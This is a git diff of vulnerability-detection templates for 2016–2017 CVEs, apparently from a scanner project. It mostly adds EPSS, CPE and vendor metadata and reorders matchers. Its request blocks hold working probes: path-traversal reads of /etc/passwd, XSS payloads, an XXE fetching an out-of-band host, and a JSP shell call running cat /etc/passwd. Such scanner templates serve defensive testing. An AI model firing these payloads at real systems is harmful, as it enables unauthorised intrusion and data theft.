+9,20 @@ info: - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt - https://www.exploit-db.com/exploits/40229/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6601 + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - tags: edb,cve,cve2016,zoho,lfi,webnms + epss-score: 0.97521 + cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zohocorp + product: webnms_framework + tags: edb,cve,cve2016,zoho,lfi,webnms http: - method: GET diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 39dbc07bf1..db2bc880c1 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -9,28 +9,34 @@ info: - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 - - http://web.archive.org/web/20210516181625/https://www.securityfocus.com/bid/97599 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 - tags: msf,cve,cve2016,lfi,auth,bypass + epss-score: 0.97039 + cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 + vendor: trendmicro + product: threat_discovery_appliance + tags: msf,cve,cve2016,lfi,auth,bypass http: - method: GET path: - "{{BaseURL}}/cgi-bin/logoff.cgi" + headers: Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" + matchers-condition: and matchers: + - type: word + part: body + words: + - "Memory map" + - type: status status: - 200 - - type: word - words: - - "Memory map" - part: body diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 83618c205c..41a91c1448 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -11,6 +11,7 @@ info: - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/ - https://jvn.jp/en/vu/JVNVU96435227/index.html - https://nvd.nist.gov/vuln/detail/CVE-2016-7834 + - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras remediation: | Upgrade to the latest version of the firmware provided by Sony. classification: @@ -18,9 +19,13 @@ info: cvss-score: 8.8 cve-id: CVE-2016-7834 cwe-id: CWE-200 - tags: sony,backdoor,unauth,telnet,iot,camera + epss-score: 0.00202 + cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sony + product: snc_series_firmware + tags: sony,backdoor,unauth,telnet,iot,camera http: - method: GET diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 7454a2b6c9..f57462717a 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -11,14 +11,19 @@ info: - https://core.spip.net/projects/spip/repository/revisions/23201 - https://core.spip.net/projects/spip/repository/revisions/23200 - https://nvd.nist.gov/vuln/detail/CVE-2016-7981 + - http://www.openwall.com/lists/oss-security/2016/10/05/17 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-7981 cwe-id: CWE-79 - tags: cve,cve2016,xss,spip + epss-score: 0.00258 + cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: spip + product: spip + tags: cve,cve2016,xss,spip http: - method: GET @@ -28,15 +33,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 50bc78e888..0e493c6378 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - tags: cve2016,aruba,xss,edb,cve + epss-score: 0.00249 + cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hp + product: airwave + tags: cve2016,aruba,xss,edb,cve http: - method: GET @@ -26,17 +30,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 99941684d2..dac4e960bc 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-0929 cwe-id: CWE-918 - tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf + epss-score: 0.03588 + cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dnnsoftware + product: dotnetnuke + tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index ae3496d18c..4d94a25c8a 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000028 cwe-id: CWE-22 - tags: oracle,glassfish,lfi,edb,cve,cve2017 + epss-score: 0.97522 + cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* metadata: max-request: 2 + vendor: oracle + product: glassfish_server + tags: oracle,glassfish,lfi,edb,cve,cve2017 http: - method: GET @@ -27,6 +31,7 @@ http: - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" stop-at-first-match: true + matchers-condition: or matchers: - type: dsl diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index fbea33fe21..1bbc8eeac8 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000029 cwe-id: CWE-200 - tags: cve,cve2017,glassfish,oracle,lfi + epss-score: 0.00387 + cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 + vendor: oracle + product: glassfish_server + tags: cve,cve2017,glassfish,oracle,lfi http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 2eac717189..721faefdf7 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -14,18 +14,21 @@ info: cvss-score: 6.1 cve-id: CVE-2017-1000163 cwe-id: CWE-601 - tags: cve,cve2017,redirect,phoenix + epss-score: 0.00151 + cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phoenixframework + product: phoenix + tags: cve,cve2017,redirect,phoenix http: - method: GET - path: - '{{BaseURL}}/?redirect=/\interact.sh' matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - part: header diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 239420d1ed..31817b86cf 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -15,25 +15,30 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000170 cwe-id: CWE-22 + epss-score: 0.73129 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* - epss-score: 0.74745 - tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm metadata: max-request: 1 + vendor: jqueryfiletree_project + product: jqueryfiletree + tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm http: - method: POST path: - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and matchers: - type: word + part: body words: - "
  • " - "passwd
    • " condition: and - part: body + - type: status status: - 200 diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index e4749942a5..11918414a4 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -10,14 +10,19 @@ info: - https://github.com/pimps/CVE-2017-1000486 - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 + - https://cryptosense.com/weak-encryption-flaw-in-primefaces/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-1000486 cwe-id: CWE-326 - tags: cve,cve2017,primetek,rce,injection,kev + epss-score: 0.97108 + cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: primetek + product: primefaces + tags: cve,cve2017,primetek,rce,injection,kev http: - raw: @@ -32,6 +37,6 @@ http: matchers: - type: word + part: header words: - 'Mogwailabs: CHECKCHECK' - part: header diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 6bbf479445..aca96fe8e0 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -10,14 +10,19 @@ info: - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940 - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 + - http://www.securitytracker.com/id/1038940 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2017-10075 + epss-score: 0.00409 + cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 2 google-query: inurl:"/cs/idcplg" verified: true + vendor: oracle + product: webcenter_content tags: cve,cve2017,xss,oracle http: @@ -27,6 +32,7 @@ http: - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 711d984e34..e60db1cf4b 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -11,13 +11,18 @@ info: - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html - https://nvd.nist.gov/vuln/detail/CVE-2017-10271 + - http://www.securitytracker.com/id/1039608 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2017-10271 - tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle + epss-score: 0.97429 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: oracle + product: weblogic_server + tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle http: - raw: @@ -53,7 +58,6 @@ http: - - | POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: {{Hostname}} @@ -83,6 +87,7 @@ http: stop-at-first-match: true + matchers-condition: or matchers: - type: dsl diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 47f6696f84..f1358975ae 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-10974 cwe-id: CWE-22 - tags: edb,cve,cve2017,yaws,lfi + epss-score: 0.96161 + cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: yaws + product: yaws + tags: edb,cve,cve2017,yaws,lfi http: - method: GET @@ -26,6 +30,10 @@ http: matchers-condition: and matchers: + - type: dsl + dsl: + - '!contains(tolower(body), " <% @@ -45,6 +48,9 @@ http: } %> + headers: + Content-Type: application/x-www-form-urlencoded + - method: GET path: - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd" diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 62e33bc1bf..15bba35a88 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -1,4 +1,4 @@ -id: CVE-2017-12617 +id: "CVE-2017-12617" info: name: Apache Tomcat - Remote Code Execution @@ -11,14 +11,20 @@ info: - https://github.com/cyberheartmi9/CVE-2017-12617 - https://www.exploit-db.com/exploits/43008 - https://nvd.nist.gov/vuln/detail/CVE-2017-12617 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.3 + cvss-score: 8.1 + cve-id: "CVE-2017-12617" cwe-id: CWE-434 + epss-score: 0.97541 + cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 shodan-query: html:"Apache Tomcat" + vendor: apache + product: tomcat tags: cve,cve2017,tomcat,apache,rce,kev,intrusive http: diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index e367edb09f..d3145ab7a8 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -10,36 +10,39 @@ info: - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 + - http://mail-archives.us.apache.org/mod_mbox/www-announce/201710.mbox/%3CCAOOKt51UO_6Vy%3Dj8W%3Dx1pMbLW9VJfZyFWz7pAnXJC_OAdSZubA%40mail.gmail.com%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - epss-score: 0.97449 - tags: oast,xxe,vulhub,cve,cve2017,solr,apache + epss-score: 0.97491 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: solr + tags: oast,xxe,vulhub,cve,cve2017,solr,apache http: - raw: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} - - | GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1 Host: {{Hostname}} matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" extractors: - type: regex - internal: true name: core group: 1 regex: - '"name"\:"(.*?)"' + internal: true diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 6ddb4d7ad9..86bd636b7b 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -8,16 +8,21 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-12635 - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E - - http://web.archive.org/web/20210414010253/https://www.securityfocus.com/bid/101868 - https://security.gentoo.org/glsa/201711-16 + - https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html + - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03935en_us classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-12635 cwe-id: CWE-269 - tags: cve,cve2017,couchdb,apache + epss-score: 0.97536 + cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: couchdb + tags: cve,cve2017,couchdb,apache,intrusive http: - raw: @@ -39,15 +44,15 @@ http: - type: word part: header words: - - "application/json" + - application/json - "Location:" - type: word part: body words: - - "org.couchdb.user:poc" - - "conflict" - - "Document update conflict" + - org.couchdb.user:poc + - conflict + - Document update conflict - type: status status: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 14e05bd5a4..dfe34e0048 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -15,25 +15,29 @@ info: cvss-score: 7.5 cve-id: CVE-2017-12637 cwe-id: CWE-22 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:* epss-score: 0.00648 + cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 + vendor: sap + product: netweaver_application_server_java tags: cve,cve2017,sap,lfi,java,traversal http: - method: GET path: - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.." + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - "WEB-INF" - "META-INF" condition: and - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 9852dc47d1..e543208310 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -11,14 +11,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 + - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 - tags: xss,django,cve,cve2017 + epss-score: 0.00219 + cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: djangoproject + product: django + tags: xss,django,cve,cve2017 http: - method: GET @@ -28,15 +33,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + + - type: word + part: header + words: + - "text/html" - type: status status: - 200 - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 08f1a07640..4934a266ec 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -15,9 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2017-14135 cwe-id: CWE-78 + epss-score: 0.96679 + cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Dreambox WebControl" + vendor: dreambox + product: opendreambox tags: cve2017,dreambox,rce,oast,edb,cve http: diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 62549778a6..b9d8e3ff74 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -11,16 +11,22 @@ info: - https://fortiguard.com/advisory/FG-IR-17-242 - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891 - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 + - http://www.securitytracker.com/id/1039891 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-14186 cwe-id: CWE-79 + epss-score: 0.02948 + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: port:10443 http.favicon.hash:945408572 verified: true + vendor: fortinet + product: fortios tags: cve,cve2017,fortigate,xss,fortinet + http: - method: GET path: diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 81b8eb1419..5c3543cffa 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -10,18 +10,22 @@ info: - https://seclists.org/fulldisclosure/2017/Sep/57 - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 - tags: cve,cve2017,redirect,opentext,seclists + epss-score: 0.00329 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve,cve2017,redirect,opentext,seclists http: - method: GET - path: - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 7449d0c515..3407bba7c6 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -10,16 +10,19 @@ info: - https://www.exploit-db.com/exploits/49913 - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t + - https://twitter.com/tiger_tigerboy/status/962689803270500352 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-14535 cwe-id: CWE-78 - cpe: cpe:2.3:a:netfortris:trixbox:*:*:*:*:*:*:*:* - epss-score: 0.04 - tags: cve,cve2017,trixbox,rce,injection,edb + epss-score: 0.06176 + cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netfortris + product: trixbox + tags: cve,cve2017,trixbox,rce,injection,edb http: - raw: @@ -34,7 +37,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index f3040c18eb..c29c76fac5 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -15,13 +15,14 @@ info: cvss-score: 6.5 cve-id: CVE-2017-14537 cwe-id: CWE-22 - cpe: cpe:2.3:a:netfortris:trixbox:*:*:*:*:*:*:*:* - epss-score: 0.01679 + epss-score: 0.01002 + cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: netfortris + product: trixbox tags: cve,cve2017,trixbox,lfi,packetstorm - http: - raw: - | @@ -33,7 +34,6 @@ http: Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages - - | GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 Host: {{Hostname}} @@ -45,11 +45,11 @@ http: matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index c43bd2089c..bd35884585 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -8,7 +8,6 @@ info: WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks. reference: - https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html - - https://web.archive.org/web/20200227144721/http://www.securityfocus.com/bid/101050 - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622 - https://nvd.nist.gov/vuln/detail/CVE-2017-14622 @@ -17,9 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-14622 cwe-id: CWE-79 + epss-score: 0.00135 + cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: 2kblater + product: 2kb_amazon_affiliates_store tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm http: @@ -30,7 +34,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index bc149ef0b2..c72ce37e1e 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -15,10 +15,13 @@ info: cvss-score: 4.8 cve-id: CVE-2017-14651 cwe-id: CWE-79 - epss-score: 0.00141 - tags: cve,cve2017,wso2,xss + epss-score: 0.00144 + cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 + product: api_manager + tags: cve,cve2017,wso2,xss http: - method: GET @@ -27,15 +30,14 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - "Failed to add new collection" - part: body condition: and - type: word + part: header words: - "text/html" - part: header diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 8751329f8d..abe5cdef83 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -9,26 +9,31 @@ info: - https://twitter.com/nodejs/status/913131152868876288 - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - https://nvd.nist.gov/vuln/detail/CVE-2017-14849 - - http://web.archive.org/web/20210423143109/https://www.securityfocus.com/bid/101056 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-14849 cwe-id: CWE-22 - tags: cve,cve2017,nodejs,lfi + epss-score: 0.96872 + cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nodejs + product: node.js + tags: cve,cve2017,nodejs,lfi http: - method: GET path: - "{{BaseURL}}/static/../../../a/../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 23ca464303..8b73a01a3f 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-15287 cwe-id: CWE-79 - tags: 